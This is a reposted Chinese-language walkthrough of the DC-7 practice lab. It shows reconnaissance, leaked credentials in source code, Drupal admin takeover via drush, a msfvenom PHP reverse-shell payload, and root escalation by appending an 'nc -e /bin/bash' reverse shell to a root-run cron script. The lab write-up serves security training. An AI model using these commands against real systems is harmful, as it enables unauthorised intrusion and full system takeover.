0


DC系列靶场---DC 7靶场的渗透测试

DC-7渗透测试

信息收集

地址探测

使用arpscan对目标地址进行探测

arp-scan -l I eth0

得到目标主机IP地址为172.30.1.132

扫描端口

使用nmap对目标主机做端口扫描

nmap -sS -sV -T4 -p- -O 172.30.1.132

扫描到目标主机开启了80端口、22端口。

-sS Nmap的SYN扫描,也叫密码扫描,也是Nmap的默认扫描

-sV 对服务版本做检测

-T4 野蛮的扫描

-p- 对所有端口做扫描

-O 对目标主机服务器版本做扫描

CMS探测

使用whatweb对目标主机进行CMS扫描

whatweb -v http://172.30.1.132

//-v 显示详细信息

这里看到是Drupal

Http探测

访问目标网站

提示说暴力破解或者字典攻击是不能成功的,要跳出这个常规思维

我们在网站的页脚看到有个名称,那我们可以对这个名称进行社工。

漏洞探测及利用

代码审计

将源码下载后进行代码审计

cat config.php

看到源码中有config的文件,这个肯定是配置文件,可以看一下。

username = "dc7user";

password = "MdR3xOgB7#dW";

看到有个用户名和密码,去网站登录发现登不上。

扫描端口的时候看到开放了22端口,尝试一下通过ssh登录。

获取shell

通过ssh登录

ssh [email protected]

登录成功啦

信息收集

这里看到有好多邮件

mail

而且每个邮件相隔15分钟,应该是个脚本文件。

输入1,先查看第一个邮件

退出 q

还真是个脚本文件,路径是/opt/scripts/backups.sh,看一下这个脚本

看到一个drush程序

漏洞利用

Drush 是一个用于 Drupal 网站管理的强大命令行工具。通过 Drush,开发者可以在终端中执行常见的 Drupal 操作,如安装、更新、清理缓存等,极大地提高了开发效率。

drush全称drupal shell,是drupal基于命令行的工具,常用命令:

$ drush cr 各种清缓存

$ drush pm-enable 安装module

$ drush pm-uninstall 卸载module

$ drush pm-list 显示所有modules and themes列表

还可以更改用户名密码

drush user-password admin --password=admin

更改admin的密码,这时候我们去网站尝试登录,发现登录成功。

登录到后台尝试写入木马

通过安装PHP模块

Manage>Extend>List>Install new module

启用PHP Filter模块

下方有个Install按钮

测试PHP filter模块是否能正常使用

其目的是允许执行php代码的页面

使用msfvenom 生成php木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.30.1.20 LPORT=2226 -f raw

写入

提权

使用msf侦听获取shell

 use exploit/multi/handler 
 set payload php/meterpreter/reverse_tcp
 set LHOST 172.30.1.20
 set LPORT 2226
 exploit

还是刚才那个脚本,因为这个脚本文件使用root权限执行。

反弹shell

echo 'nc -e /bin/bash 172.30.1.20 7777' >> /opt/scripts/backups.sh

来到这个脚本文件路径下,利用nc反弹shell

Kali端侦听端口

nc -lnvp 7777
cd /root
cat theflag.txt

这个时候要等,因为这个脚本文件是每15分钟执行一次,所以只需要等待就可以。

总结

1、网站页脚看到管理员的名称,对管理员名称进行社工。

2、github中下载源码进行代码审计,config也就是配置文件看到用户名和密码。

3、在网站中登录发现不行,之前还扫到一个22端口,通过22端口远程登陆上。

4、通过查看邮件发现使用了drupal中drush程序,这个工具可以更改用户的密码。

5、过drush更改用户的密码,登录到网站后台安装php模块。

6、使用phpinfo进行测试,是否可以正常使用。

7、使用msfvenom生成php的恶意执行代码。

8、邮件通过脚本执行,每15分钟执行一次,把nc的反弹shell写入脚本文件,攻击端侦听,等待目标主机执行脚本。

标签: windows 网络 安全

本文转载自: https://blog.csdn.net/zhouA0221/article/details/141003999
版权归原作者 白帽子二三 所有, 如有侵权,请联系我们删除。

“DC系列靶场---DC 7靶场的渗透测试”的评论:

还没有评论